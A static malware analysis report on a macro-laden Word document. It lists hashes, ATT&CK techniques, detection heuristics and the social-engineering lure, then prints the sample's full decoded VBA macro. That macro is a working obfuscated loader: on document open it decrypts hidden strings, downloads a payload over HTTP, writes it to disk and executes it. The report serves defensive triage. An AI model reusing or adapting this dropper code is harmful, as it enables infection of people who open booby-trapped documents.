Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c2516e85c502badf…

MALICIOUS

Office (OOXML)

31.9 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-19
MD5: 237f72d64d299d8dd0c750993171b5f0 SHA-1: 1c88aed6e11be0cf885fb6c8047db7a6d20b3dfb SHA-256: c2516e85c502badf7aeed69c7fa5e6f01f3da9a66839c294891a20e7d73149cb
360 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing obfuscated VBA macros, specifically an auto-exec loader within the Document_Open macro. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic to bypass macro security. The VBA script likely attempts to download and execute a second-stage payload, as indicated by the 'CreateObject' and 'GetObject' calls and the presence of obfuscated code.

Heuristics 11

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set IX7nPswwL81Iv57SL = CreateObject(TdxHQmp4YyTfAv(Chr(116) + Chr(126) + Chr(111) + Chr(223) + Chr(78) + Chr(50) + Chr(123) + Chr(117) + Chr(149) + Chr(124) + Chr(205) + Chr(11) + Chr(77) + Chr(220) + Chr(81) + Chr(172) + Chr(130), "NAoUWNKg7kiDfr"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set IX7nPswwL81Iv57SL = CreateObject(TdxHQmp4YyTfAv(Chr(116) + Chr(126) + Chr(111) + Chr(223) + Chr(78) + Chr(50) + Chr(123) + Chr(117) + Chr(149) + Chr(124) + Chr(205) + Chr(11) + Chr(77) + Chr(220) + Chr(81) + Chr(172) + Chr(130), "NAoUWNKg7kiDfr"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    GetObject 50, 75
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    XKklIk9ltC9O6Xms = Environ(TdxHQmp4YyTfAv(Chr(177) + Chr(244) + Chr(186) + Chr(62) + Chr(169) + Chr(129) + Chr(125), "BKm63bDMFnIIzI")) & "\" & UnelUImol & TdxHQmp4YyTfAv(Chr(172) + Chr(174) + Chr(250) + Chr(231), "OHBiruGtMXyBAL")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12699 bytes
SHA-256: 7c91153180c8f9364edd1ebd09b5764d2711e6554d973aa641f0868f725105ab
Detection
ClamAV: No threats found
Obfuscation or payload: likely
87 of 170 identifiers look randomly generated (e.g. 'W82Rn8LmB6PtOWsR4') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TdxHQmp4YyTfAv(ByVal GwLlmE4kHK9 As String, ByVal WHfIWN As String) As String
Dim Oou1OLLa As Long, NcChujs2FtI As Long
Oou1OLLa = 7
NcChujs2FtI = 80
If Oou1OLLa + NcChujs2FtI > 2 Then
NcChujs2FtI = Oou1OLLa + 33
Else
MsgBox 76
End If
On Error Resume Next
Dim U1i9zvcWp4INlt As Long, If0Ex6LXuyeGv5 As Long
U1i9zvcWp4INlt = 88
If0Ex6LXuyeGv5 = 35
If U1i9zvcWp4INlt + If0Ex6LXuyeGv5 > 2 Then
If0Ex6LXuyeGv5 = U1i9zvcWp4INlt + 69
Else
MsgBox 92
End If
Dim DX9RsbU4jPU(0 To 255) As Integer, O9ZeNZMYhnv As Long, A8zOaZ9V8P As Long, StEwKW95NKSqFWl As Long, JqrgyWe5DKU9fmukX() As Byte, AJB9OTBu68Rfhws() As Byte, YNQFEg7ZKFpt2TkgE As Byte
Dim GWeApUymX7F As Long, GafLgYHH9g As Long
GWeApUymX7F = 78
GafLgYHH9g = 40
If GWeApUymX7F + GafLgYHH9g > 2 Then
GafLgYHH9g = GWeApUymX7F + 57
Else
MsgBox 58
End If
JqrgyWe5DKU9fmukX() = StrConv(WHfIWN, vbFromUnicode)
Dim XiFKmJHCIJIvGhSjE As Long, Q3KiOXMK As Long
XiFKmJHCIJIvGhSjE = 63
Q3KiOXMK = 84
If XiFKmJHCIJIvGhSjE + Q3KiOXMK > 2 Then
Q3KiOXMK = XiFKmJHCIJIvGhSjE + 95
Else
MsgBox 88
End If
For O9ZeNZMYhnv = 0 To 255
DX9RsbU4jPU(O9ZeNZMYhnv) = O9ZeNZMYhnv
Next O9ZeNZMYhnv
O9ZeNZMYhnv = 0
A8zOaZ9V8P = 0
StEwKW95NKSqFWl = 0
For O9ZeNZMYhnv = 0 To 255
A8zOaZ9V8P = (A8zOaZ9V8P + DX9RsbU4jPU(O9ZeNZMYhnv) + JqrgyWe5DKU9fmukX(O9ZeNZMYhnv Mod Len(WHfIWN))) Mod 256
YNQFEg7ZKFpt2TkgE = DX9RsbU4jPU(O9ZeNZMYhnv)
DX9RsbU4jPU(O9ZeNZMYhnv) = DX9RsbU4jPU(A8zOaZ9V8P)
DX9RsbU4jPU(A8zOaZ9V8P) = YNQFEg7ZKFpt2TkgE
Next O9ZeNZMYhnv
O9ZeNZMYhnv = 0
A8zOaZ9V8P = 0
StEwKW95NKSqFWl = 0
AJB9OTBu68Rfhws() = StrConv(GwLlmE4kHK9, vbFromUnicode)
For O9ZeNZMYhnv = 0 To Len(GwLlmE4kHK9)
A8zOaZ9V8P = (A8zOaZ9V8P + 1) Mod 256
StEwKW95NKSqFWl = (StEwKW95NKSqFWl + DX9RsbU4jPU(A8zOaZ9V8P)) Mod 256
YNQFEg7ZKFpt2TkgE = DX9RsbU4jPU(A8zOaZ9V8P)
DX9RsbU4jPU(A8zOaZ9V8P) = DX9RsbU4jPU(StEwKW95NKSqFWl)
DX9RsbU4jPU(StEwKW95NKSqFWl) = YNQFEg7ZKFpt2TkgE
AJB9OTBu68Rfhws(O9ZeNZMYhnv) = AJB9OTBu68Rfhws(O9ZeNZMYhnv) Xor (DX9RsbU4jPU((DX9RsbU4jPU(A8zOaZ9V8P) + DX9RsbU4jPU(StEwKW95NKSqFWl)) Mod 256))
Next O9ZeNZMYhnv
Dim TFZARJnZF91YP As Long, WbIuivgl84K As Long
TFZARJnZF91YP = 49
WbIuivgl84K = 80
If TFZARJnZF91YP + WbIuivgl84K > 2 Then
WbIuivgl84K = TFZARJnZF91YP + 32
Else
MsgBox 31
End If
TdxHQmp4YyTfAv = StrConv(AJB9OTBu68Rfhws, vbUnicode)
Dim IGR1vVH0claz As Long, PjyRhT25Q As Long
IGR1vVH0claz = 89
PjyRhT25Q = 7
If IGR1vVH0claz + PjyRhT25Q > 2 Then
PjyRhT25Q = IGR1vVH0claz + 8
Else
MsgBox 5
End If
End Function
Sub EzgNfWz0ZkLoUPGSW()
Dim L8Bw6mvgjK9 As Long, UTo3U01f As Long
L8Bw6mvgjK9 = 47
UTo3U01f = 87
If L8Bw6mvgjK9 + UTo3U01f > 2 Then
UTo3U01f = L8Bw6mvgjK9 + 13
Else
MsgBox 88
End If
Dim XKklIk9ltC9O6Xms As String, IX7nPswwL81Iv57SL As Object, FKYGumBeAorY8pCb As Integer
Dim QvhlrLfJlgq As Long, Iyrli8v As Long
QvhlrLfJlgq = 46
Iyrli8v = 90
If QvhlrLfJlgq + Iyrli8v > 2 Then
Iyrli8v = QvhlrLfJlgq + 4
Else
MsgBox 17
End If
XKklIk9ltC9O6Xms = Environ(TdxHQmp4YyTfAv(Chr(177) + Chr(244) + Chr(186) + Chr(62) + Chr(169) + Chr(129) + Chr(125), "BKm63bDMFnIIzI")) & "\" & UnelUImol & TdxHQmp4YyTfAv(Chr(172) + Chr(174) + Chr(250) + Chr(231), "OHBiruGtMXyBAL")
Dim LxJJjzbB9K5cV As Long, RaXUss8bY As Long
LxJJjzbB9K5cV = 20
RaXUss8bY = 41
If LxJJjzbB9K5cV + RaXUss8bY > 2 Then
RaXUss8bY = LxJJjzbB9K5cV + 30
Else
MsgBox 65
End If
Set IX7nPswwL81Iv57SL = CreateObject(TdxHQmp4YyTfAv(Chr(116) + Chr(126) + Chr(111) + Chr(223) + Chr(78) + Chr(50) + Chr(123) + Chr(117) + Chr(149) + Chr(124) + Chr(205) + Chr(11) + Chr(77) + Chr(220) + Chr(81) + Chr(172) + Chr(130), "NAoUWNKg7kiDfr"))
Dim Sn7YUYkBErToqYCP5 As Long, FwZbw3wLT5MbOR As Long
Sn7YUYkBErToqYCP5 = 51
FwZbw3wLT5MbOR = 74
If Sn7YUYkBErToqYCP5 + FwZbw3wLT5MbOR > 2 Then
FwZbw3wLT5MbOR = Sn7YUYkBErToqYCP5 + 51
Else
MsgBox 46
End If
IX7nPswwL81Iv57SL.Open TdxHQmp4YyTfAv(Chr(141) + Chr(214) + Chr(20), "SzpsyAYAuq4CYe"), TdxHQmp4YyTfAv(Chr(103) + Chr(110) + Chr(122) + Chr(7) + Chr(171) + Chr(80) + Chr(39) + Chr(106) + Chr(147) + Chr(24) + Chr(77) + Chr(183) + Chr(59) + Chr(172) + Chr(166) + Chr(168) + Chr(246) + Chr(60) + Chr(238) + Chr(220) + Chr(149) + Chr(169) + Chr(69) + Chr(214) + Chr(145) + Chr(242) + Chr(180), "KU01fjzbB9K5cV"), False
Dim Ikuki4QO1Y As Long, YJN As Long
Ikuki4QO1Y = 69
YJN = 18
If Ikuki4QO1Y + YJN > 2 Then
YJN = Ikuki4QO1Y + 73
Else
MsgBox 32
End If
IX7nPswwL81Iv57SL.setRequestHeader TdxHQmp4YyTfAv(Chr(61) + Chr(183) + Chr(93) + Chr(136) + Chr(236) + Chr(243) + Chr(234) + Chr(11) + Chr(25) + Chr(67), "YprGRxj4yT8ABD"), TdxHQmp4YyTfAv(Chr(126) + Chr(246) + Chr(91) + Chr(49) + Chr(186) + Chr(103) + Chr(123) + Chr(46) + Chr(184) + Chr(191) + Chr(202), "GEpSVuogVD9wd3Bt")
IX7nPswwL81Iv57SL.send
If IX7nPswwL81Iv57SL.readyState = 4 And IX7nPswwL81Iv57SL.Status = 200 Then
Dim RvyLZ3beM2Uj As Long, Q9fF46u As Long
RvyLZ3beM2Uj = 10
Q9fF46u = 24
If RvyLZ3beM2Uj + Q9fF46u > 2 Then
Q9fF46u = RvyLZ3beM2Uj + 81
Else
MsgBox 7
End If
FKYGumBeAorY8pCb = FreeFile
Open XKklIk9ltC9O6Xms For Binary Access Write Lock Write As #FKYGumBeAorY8pCb
Put #FKYGumBeAorY8pCb, , TdxHQmp4YyTfAv(StrConv(IX7nPswwL81Iv57SL.ResponseBody, vbUnicode), TdxHQmp4YyTfAv(Chr(142) + Chr(122) + Chr(17) + Chr(96) + Chr(106) + Chr(196) + Chr(179) + Chr(0) + Chr(214), "FwEt"))
Close #FKYGumBeAorY8pCb
Dim P3YYeGEJps7g As Long, B3gh4q5W7Kg As Long
P3YYeGEJps7g = 27
B3gh4q5W7Kg = 72
If P3YYeGEJps7g + B3gh4q5W7Kg > 2 Then
B3gh4q5W7Kg = P3YYeGEJps7g + 36
Else
MsgBox 92
End If
Y4gpuqhnv 1
Dim WpLpAvf7uZ7 As Long, H0rBKAgUgCV As Long
WpLpAvf7uZ7 = 65
H0rBKAgUgCV = 30
If WpLpAvf7uZ7 + H0rBKAgUgCV > 2 Then
H0rBKAgUgCV = WpLpAvf7uZ7 + 35
Else
MsgBox 74
End If
CreateObject(TdxHQmp4YyTfAv(Chr(70) + Chr(186) + Chr(128) + Chr(69) + Chr(137) + Chr(214) + Chr(175) + Chr(74) + Chr(1) + Chr(239) + Chr(169) + Chr(231) + Chr(231), "O5n5vf")).exec """" & XKklIk9ltC9O6Xms & """"
Dim SLxp2p As Long, YTWkcIZQ9UGI As Long
SLxp2p = 54
YTWkcIZQ9UGI = 62
If SLxp2p + YTWkcIZQ9UGI > 2 Then
YTWkcIZQ9UGI = SLxp2p + 12
Else
MsgBox 89
End If
End If
Dim OrtSmT As Long, DUGSYhXA3M As Long
OrtSmT = 78
DUGSYhXA3M = 17
If OrtSmT + DUGSYhXA3M > 2 Then
DUGSYhXA3M = OrtSmT + 76
Else
MsgBox 23
End If
Set IX7nPswwL81Iv57SL = Nothing
Dim QV19V65y As Long, XvCUQjxp2p As Long
QV19V65y = 74
XvCUQjxp2p = 2
If QV19V65y + XvCUQjxp2p > 2 Then
XvCUQjxp2p = QV19V65y + 21
Else
MsgBox 88
End If
End Sub
Sub Document_Open()
Dim Qbsokunb7E As Long, Omep7hKFCf1 As Long
Qbsokunb7E = 50
Omep7hKFCf1 = 75
If Qbsokunb7E + Omep7hKFCf1 > 2 Then
Omep7hKFCf1 = Qbsokunb7E + 73
Else
MsgBox 5
End If
Dim FTyftY0eDS As Long, CJet2rH As Long, NAkyXT5eC As Long
Dim Ne39KWF As Long, BJ7kp6WasFK As Long
Ne39KWF = 22
BJ7kp6WasFK = 84
If Ne39KWF + BJ7kp6WasFK > 2 Then
BJ7kp6WasFK = Ne39KWF + 96
Else
MsgBox 34
End If
FTyftY0eDS = 981818942: CJet2rH = 0: NAkyXT5eC = 0
Dim HGxT6pBFb0fvdRv As Long, XdQGIyJ5dnowc9p7g As Long
HGxT6pBFb0fvdRv = 16
XdQGIyJ5dnowc9p7g = 4
If HGxT6pBFb0fvdRv + XdQGIyJ5dnowc9p7g > 2 Then
XdQGIyJ5dnowc9p7g = HGxT6pBFb0fvdRv + 39
Else
MsgBox 33
End If
For CJet2rH = 1 To FTyftY0eDS
NAkyXT5eC = NAkyXT5eC + 1
Next CJet2rH
Dim VFClAQCM6WasFK As Long, PJJiSpdTSVq4 As Long
VFClAQCM6WasFK = 81
PJJiSpdTSVq4 = 78
If VFClAQCM6WasFK + PJJiSpdTSVq4 > 2 Then
PJJiSpdTSVq4 = VFClAQCM6WasFK + 88
Else
MsgBox 59
End If
If NAkyXT5eC = FTyftY0eDS Then
Dim QrR12d50t3 As Long, Tvj3 As Long
QrR12d50t3 = 97
Tvj3 = 82
If QrR12d50t3 + Tvj3 > 2 Then
Tvj3 = QrR12d50t3 + 75
Else
MsgBox 97
End If
EzgNfWz0ZkLoUPGSW
Dim Gy2NDqX8vg7rp0 As Long, WBdXBeDG6a As Long
Gy2NDqX8vg7rp0 = 91
WBdXBeDG6a = 74
If Gy2NDqX8vg7rp0 + WBdXBeDG6a > 2 Then
WBdXBeDG6a = Gy2NDqX8vg7rp0 + 1
Else
MsgBox 21
End If
Else
Dim QxUduCTpA85 As Long, S2NnCuCQ9 As Long
QxUduCTpA85 = 22
S2NnCuCQ9 = 57
If QxUduCTpA85 + S2NnCuCQ9 > 2 Then
S2NnCuCQ9 = QxUduCTpA85 + 7
Else
MsgBox 57
End If
W82Rn8LmB6PtOWsR4
Dim PJzbJG739KWF As Long, Bu8OYC2cJoGcLwG As Long
PJzbJG739KWF = 26
Bu8OYC2cJoGcLwG = 71
If PJzbJG739KWF + Bu8OYC2cJoGcLwG > 2 Then
Bu8OYC2cJoGcLwG = PJzbJG739KWF + 61
Else
MsgBox 18
End If
End If
Dim Ung1vMXjP As Long, BIj8Wiiwm As Long
Ung1vMXjP = 9
BIj8Wiiwm = 24
If Ung1vMXjP + BIj8Wiiwm > 2 Then
BIj8Wiiwm = Ung1vMXjP + 4
Else
MsgBox 64
End If
End Sub
Sub Y4gpuqhnv(KkWTzjGFhBKMJyKRx As Long)
Dim X11ATOI7lPuV As Long, SvwYl8Uh85ATMwL As Long
X11ATOI7lPuV = 60
SvwYl8Uh85ATMwL = 23
If X11ATOI7lPuV + SvwYl8Uh85ATMwL > 2 Then
SvwYl8Uh85ATMwL = X11ATOI7lPuV + 35
Else
MsgBox 71
End If
Dim FjrkMDI6RXrFQ As Long
Dim A09Ung As Long, PtJ0LW1N0q3j As Long
A09Ung = 92
PtJ0LW1N0q3j = 96
If A09Ung + PtJ0LW1N0q3j > 2 Then
PtJ0LW1N0q3j = A09Ung + 59
Else
MsgBox 97
End If
FjrkMDI6RXrFQ = Timer + KkWTzjGFhBKMJyKRx
Do While Timer < FjrkMDI6RXrFQ
DoEvents
Loop
Dim NrTTwn As Long, CkB4QJf48zU As Long
NrTTwn = 90
CkB4QJf48zU = 78
If NrTTwn + CkB4QJf48zU > 2 Then
CkB4QJf48zU = NrTTwn + 14
Else
MsgBox 8
End If
End Sub
Function UnelUImol() As String
Dim KoYKQOU82lX As Long, EKL0NcD6QkKZ As Long
KoYKQOU82lX = 85
EKL0NcD6QkKZ = 91
If KoYKQOU82lX + EKL0NcD6QkKZ > 2 Then
EKL0NcD6QkKZ = KoYKQOU82lX + 75
Else
MsgBox 23
End If
Dim BJhs6fx18() As Byte, W75FUlOmj5Sh4AvRc() As Byte, DyjBM920tm4oyRdx As Long, YxzUPk379qBCCmAps As Long, Nszge99ZAAgdgSM As String, Q1zASVqlqza6 As String, Y5MjXdC As Long
Dim N2tCWAKJwOU As Long, UF6UNa As Long
N2tCWAKJwOU = 27
UF6UNa = 22
If N2tCWAKJwOU + UF6UNa > 2 Then
UF6UNa = N2tCWAKJwOU + 10
Else
MsgBox 45
End If
Y5MjXdC = 0
Dim RHp1sACA1iRwadG As Long, Xf6DhiQNs As Long
RHp1sACA1iRwadG = 28
Xf6DhiQNs = 18
If RHp1sACA1iRwadG + Xf6DhiQNs > 2 Then
Xf6DhiQNs = RHp1sACA1iRwadG + 74
Else
MsgBox 77
End If
SfVU0DrDoUp:
Dim STYLMm09ioASId As Long, NwmoUq0tlm As Long
STYLMm09ioASId = 53
NwmoUq0tlm = 68
If STYLMm09ioASId + NwmoUq0tlm > 2 Then
NwmoUq0tlm = STYLMm09ioASId + 48
Else
MsgBox 9
End If
Randomize
Q1zASVqlqza6 = Int(30 * Rnd)
If Q1zASVqlqza6 < 4 Then GoTo SfVU0DrDoUp
Y5MjXdC = Q1zASVqlqza6
If Y5MjXdC > 0& Then
Dim AGBJFeDkOc9nEE1F As Long, XJZjpZA3lHw As Long
AGBJFeDkOc9nEE1F = 40
XJZjpZA3lHw = 79
If AGBJFeDkOc9nEE1F + XJZjpZA3lHw > 2 Then
XJZjpZA3lHw = AGBJFeDkOc9nEE1F + 89
Else
MsgBox 5
End If
Nszge99ZAAgdgSM = TdxHQmp4YyTfAv(Chr(74) + Chr(232) + Chr(174) + Chr(118) + Chr(28) + Chr(169) + Chr(186) + Chr(36) + Chr(78) + Chr(80), "N8lr768v6JB3")
Randomize
BJhs6fx18 = Nszge99ZAAgdgSM
DyjBM920tm4oyRdx = Len(Nszge99ZAAgdgSM) - 1&
Y5MjXdC = (Y5MjXdC * 2&) - 1&
ReDim W75FUlOmj5Sh4AvRc(Y5MjXdC) As Byte
Dim ULyZP0baP8 As Long, PsXheebiX As Long
ULyZP0baP8 = 56
PsXheebiX = 59
If ULyZP0baP8 + PsXheebiX > 2 Then
PsXheebiX = ULyZP0baP8 + 77
Else
MsgBox 95
End If
For YxzUPk379qBCCmAps = 0& To Y5MjXdC Step 2&
W75FUlOmj5Sh4AvRc(YxzUPk379qBCCmAps) = BJhs6fx18(CLng(DyjBM920tm4oyRdx * Rnd) * 2&)
Next
Dim XUI2JBz2Sbcg As Long, Nah As Long
XUI2JBz2Sbcg = 66
Nah = 75
If XUI2JBz2Sbcg + Nah > 2 Then
Nah = XUI2JBz2Sbcg + 47
Else
MsgBox 60
End If
End If
Dim AcmFyarMvPD As Long, PgoOA2n6sZYr As Long
AcmFyarMvPD = 52
PgoOA2n6sZYr = 71
If AcmFyarMvPD + PgoOA2n6sZYr > 2 Then
PgoOA2n6sZYr = AcmFyarMvPD + 12
Else
MsgBox 38
End If
UnelUImol = W75FUlOmj5Sh4AvRc
Dim VpGBJFeD As Long, GuZP0baP8 As Long
VpGBJFeD = 18
GuZP0baP8 = 74
If VpGBJFeD + GuZP0baP8 > 2 Then
GuZP0baP8 = VpGBJFeD + 77
Else
MsgBox 40
End If
End Function
Sub W82Rn8LmB6PtOWsR4()
Dim A2E1mWvn7l As Long, R2139kvemOoHJpi8 As Long
A2E1mWvn7l = 22
R2139kvemOoHJpi8 = 59
If A2E1mWvn7l + R2139kvemOoHJpi8 > 2 Then
R2139kvemOoHJpi8 = A2E1mWvn7l + 74
Else
MsgBox 54
End If
Weekday 60
NPer 54, 63, 89
Resume
WPvwoLw2FN9 = CSng(83)
GetObject 50, 75
Year 25
Load L1MAJJQLkSx50
TimeSerial 25, 77, 93
DatePart "KwUV4V1MO9yt", 18
Randomize
Rnd
Err.Raise 72
Second 10
L7DpY7pL5VK = LCase(69)
If CCur(16) = True Then ATpwkR4QKiQ = 501
LoadPicture 51, 72, 61, 95, 63
N4ebZMO6T7birS = Cos(10)
DateSerial 8, 76, 96
Mm4dqvBljn = Fix(8)
Beep
DateAdd "YpeK", 1, 23
TRJMNGWxGsymwKYz = CVErr(56)
IsError 84
Stop
Log 98
InputBox 2, 20, 65, 55, 12
Atn 16
Command
TimeValue 78
GetAllSettings 90, 28
Dim O4SGXb0RsERn As Long, QH1GHVOlmz As Long
O4SGXb0RsERn = 69
QH1GHVOlmz = 66
If O4SGXb0RsERn + QH1GHVOlmz > 2 Then
QH1GHVOlmz = O4SGXb0RsERn + 76
Else
MsgBox 47
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 02e0e6165ba772e4cb04836f2cf509c34ac63cbe492ee090163800d45d198c83
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.